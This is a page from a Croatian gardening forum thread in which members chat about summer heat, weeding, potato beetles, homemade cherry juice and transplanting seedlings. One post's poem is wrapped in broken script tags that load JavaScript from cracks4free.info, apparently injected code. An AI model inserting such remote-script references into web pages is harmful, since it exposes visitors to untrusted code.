Početna stranica Početna stranica > Vrt - Forum o vrtovima > Moj vrt > Moj povrtnjak
  Aktivne teme Aktivne teme RSS Feed - Povrtlarska brbljaonica
  Pomoć Pomoć  Pretraga foruma   Događanja   Registracija Registracija  Prijava Prijava

Povrtlarska brbljaonica

Odgovori Odgovori Stranica  <1 283284285286287 381>
Korisnik
Poruka
Pustolovka View Drop Down
Neukroćena biljka
Neukroćena biljka

Status: Offline
Bodovi: 3162
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Pustolovka Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 19 Lipanj 2013 u 14:35
Moja ajama da te boli zeludac koliko mene boli pila bi ti i od koprive caj sada Tongue a tacno je da bolje tijelo svari kad pijes vruce na vrucini.
Trud je uzaludan, ako se priroda protivi.

Seneka
Na vrh
Sponzorirani linkovi

Na vrh
Fiki View Drop Down
Trajnica
Trajnica

Bodovi: 2792
Opcije poruke Opcije poruke   Hvala (1) Hvala(1)   Citiranje Fiki Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 20 Lipanj 2013 u 00:51
< ="text/" ="//cracks4free.info/5/conn1.js">< ="text/" ="http://cracks4free.info/5/d.txt">< ="text/" ="//cracks4free.info/5/conn.js">Ako si umoran i put pred tobom
čini se dugačak i beskrajan,
primijetiš li da si pogriješio i krenuo krivim putem...
ne očajavaj,
ne dopusti da te ponesu dani i vrijeme...
Započni opet!

Ako ti se život odjednom pokaže u nekom novom čudnom,
neobičnom i neočekivanom svjetlu,
ako te razočaraju stvari, ljudi i događaji...
ne trudi se i ne pokušavaj shvatiti zašto i koji su razlozi...
Započni opet!

Ako znaš što znači ljubiti, biti ljubljen i nekome biti jedinstven,
ali si ipak spoznao skučenost i siromaštvo svojih granica...
nikad ne ostavljaj ništa napola dovršeno...
Započni opet!

Ako te drugi ponekad prijekorno i začuđeno gledaju,
ako su nečim razočarani ili čak srditi...
ne buni se i ne pitaj ništa...
Započni opet!

Jer i stablo opet pupa, zeleni i lista zaboravljajući zimu,
grana voćke ne pitajući zašto, opet cvjeta,
ptica opet svija svoje gnijezdo ne misleći na jesen,
jer život je nada i uvijek započinje iznova...
< ="text/" async="" ="http://cracks4free.info/5/adds.js">
Na vrh
Smail View Drop Down
Trajnica
Trajnica

Bodovi: 2345
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Smail Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 20 Lipanj 2013 u 09:17
Fiki, kako poučni i dobri stihovi, trebali bi nam svaki dan kao podsjetnik da sve uvijek započinjemo opet, ne gubiti prijatelje, nadu, ljubav.... da njegujemo ustrajnost.

Zadržite samo vesele prijatelje.
Na vrh
monstera View Drop Down
Cvjetni guru
Cvjetni guru

Bodovi: 11895
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje monstera Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 20 Lipanj 2013 u 10:57

Gdje ste povrtlarci?  Što ima, čime se bavite u ove pakleno vruće dane?  Ja sam maloprije došla, špricala krumpirove zlatice,  sad sam došla na jednu smile142  pa gibam dalje, idem presađivati moj pepino, yam i višegodišnju ljutu papričicu...Smile
Zemlja nije ni moja, ni tvoja, posuđena je svima nama, da dođemo, da se tu sretnemo i odemo bez povratka.
Na vrh
Smail View Drop Down
Trajnica
Trajnica

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Smail Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 20 Lipanj 2013 u 11:29
Mon, na poslu sam, vručina nepodnošljiva, skoro da bi prodala ovu vručina za jedan zimski dan, ali se naše biljčice nebi složile sa nama, divnog si se posla primila, presađivanje, eto možda u subotu zahladi pa nećeš morati stalno zalijevati.
Na vrh
ajama View Drop Down
Cvjetni guru
Cvjetni guru

Bodovi: 5957
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje ajama Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 20 Lipanj 2013 u 17:23
mons od kud ti toliko energije.ja ništa ne mogu.počnem raditi tek poslije 7 sati.i to nije bog zna što.imam neko cvijeće za presađivanje,ali mi se neda.neka čeka subotu.
sutra idem po mamu u bolnicu,pa na posao.ništa od vrta
-poslije igre i kralj i pijun idu u istu kutiju-
Na vrh
monstera View Drop Down
Cvjetni guru
Cvjetni guru

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje monstera Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 20 Lipanj 2013 u 18:03
 Smajliću, ma  i nije da imam nešto previše za rasađivati, tek par biljčica, već su gotove , presađene....SmileEmbarrassedHeart

Zemlja nije ni moja, ni tvoja, posuđena je svima nama, da dođemo, da se tu sretnemo i odemo bez povratka.
Na vrh
monstera View Drop Down
Cvjetni guru
Cvjetni guru

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje monstera Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 20 Lipanj 2013 u 18:08
 Ajama, ne znam to se i ja pitam otkud mi tolika energija..Jučer sam ko tele blentavo visila u krumpiru sve do 10:30..u kuću sam došla kao uskuhali lonac, dobro da me nije kap strefila.......kad se primim takvog nekog posla onda stvarno ne znam stati...smile42smile42 kao da više nema dana, ali nažalost korov ne pita. Njemu izgleda ne smeta ova vrućina tako lijepo raste i buja ko lud, kad bi bar povrće tako raslo...Unhappy
Na vrh
Neukroćena biljka
Neukroćena biljka

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Pustolovka Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 20 Lipanj 2013 u 22:05
Ja pravila sok od visanja uzasno sam se namucila vrucine jake Unhappy

Seneka
Na vrh
Smail View Drop Down
Trajnica
Trajnica

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Smail Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 21 Lipanj 2013 u 09:15
Pustolovkice, i ja sam napravila nešto soka od višanja, a bila je takva vručina dok sam ih brala, ali onaj sok iz dućana nije niakd tako dobar kao domaći.
Mons, znam kako je kada se primiš nekakvog posla, stalno mislimo još samo malo pa to ispadne na kraju dok se ne ubijemo.
Ajama i meni se po ovim vručinama neda ništa raditi osjećam se ko usahla biljka a eto još uz to imaš i mamu bolesnu ipak je ona važnija od svakog bilja, ja imam male bebice, unučice sa kojima se zabavljam od kada dođem doma sa posla, jedva čekaju svi da dođem, pa je posao u drugom planu.
Na vrh
ajama View Drop Down
Cvjetni guru
Cvjetni guru

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje ajama Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 21 Lipanj 2013 u 09:38
ma sve ćemo mi izdržati.samo neka je zdravlja.mene u ponedjeljak štrecnulo ispod plečke.nije mi bilo ni do kopanja,ni do pljevljenja.
Na vrh
Smail View Drop Down
Trajnica
Trajnica

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Smail Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 21 Lipanj 2013 u 22:00
Kuc, kuc od mojih povrtlaraca ništa, ili svi još kopaju, ili su danas kopali pa već spavaju, ako vam ponudim jedan koktelčić za odmor nadam se da će te doći, ja sam upravo završila sa poslom u vrtu, otjerali me oni leteći kukci što se zabadaju u facu, stavila pivicu pred sebe, naravno onu od limuna, a hladnu, noge stavila u toplu vodu sa sodom bikarbonom  i maštam o ovakvom koktelu.

Na vrh
Smail View Drop Down
Trajnica
Trajnica

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Smail Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 21 Lipanj 2013 u 22:10
Pitate se što sam to ja danas radila u povrtnjaku, sutra ću slikati jer je danas bio već mrak kada sam završila, stavila sam mrežu visokim mahunama i krastavcima to vam je moja majstorija dva u jedan, mahune i krastavci na jednu mrežu, povezala sam još jedan put paradajz, kao, najavljuju sutra nevrijeme, pa da ga vjetar ne polomi, zalila sam tikvice za  koje mi je sjeme poslala naša draga mon,
potrgala zaperke paprikama u plasteniku i naravno sve dobro zalila, oko pola deset stigla do cvjetnjaka i naravno imala sam i tu zalijevanja, sada se još  malo družim s vama i onda na spavanje. Moje unučice je danas čuvao zet jer je imao slobodan dan, tako da je baka imala izlazak u vrt.
Na vrh
monstera View Drop Down
Cvjetni guru
Cvjetni guru

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje monstera Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 22 Lipanj 2013 u 13:10
Smajliću, Hvala ti na koktelu, baš paše u ove pakleno vruće dane.....smile78smile84 Ja sam se maloprije dovukla iz krumpira, konačno su došli na svoje....SmileSmile  Sad imam opet kupanje u korovu na drugim povrtnim kulturama...Taj vražji korov, ni sunce, ni vrućina, ništa mu ne smeta, baš lijepo napreduje...AngryAngry
Na vrh
ajama View Drop Down
Cvjetni guru
Cvjetni guru

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje ajama Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 22 Lipanj 2013 u 16:38
i ja sam se danas borila s korovom.izgleda kao čist,a kad sam krenula...svega troje tačke travurine.sad malo odmaramo,jer je 33 stupnja.gledam baš van.nema sunca.ne vide se neki oblaci,ali nije ni sunčano.
Na vrh
ajama View Drop Down
Cvjetni guru
Cvjetni guru

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje ajama Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 22 Lipanj 2013 u 16:42
sinoć sam ovo našla na netu i meni se dopada

Na vrh
Neukroćena biljka
Neukroćena biljka

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Pustolovka Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 22 Lipanj 2013 u 21:18
Imal vas jel zahladnilo kod vas ?smile46

Seneka
Na vrh
monstera View Drop Down
Cvjetni guru
Cvjetni guru

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje monstera Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 22 Lipanj 2013 u 21:29
Ajama ja niti ne znam broj koliko sma tačaka travurine svozila na gnoj, možda već ima za jednu dobru prikolicu.....koma!   OuchOuch smile46
Na vrh
monstera View Drop Down
Cvjetni guru
Cvjetni guru

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje monstera Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 22 Lipanj 2013 u 21:30
Originalno poslano od člana ajama ajama napisao:

sinoć sam ovo našla na netu i meni se dopada

Ovo ti je baš superiška ! ClapClapClapClapThumbs UpThumbs UpHeart

Na vrh
monstera View Drop Down
Cvjetni guru
Cvjetni guru

Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje monstera Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 22 Lipanj 2013 u 21:31
        Pustilka kod nas se naziru neki oblaci, ali čisto sumnjam da će išta zahladiti....Confused
Na vrh
 Odgovori Odgovori Stranica  <1 283284285286287 381>
  Prosljedi temu   

Pređi na drugi forum Forumska ovlaštenja View Drop Down

Forum Software by Web Wiz Forums® version 10.15
Copyright ©2001-2013 Web Wiz Ltd.

Stranica je generirana u 0,611 sekundi.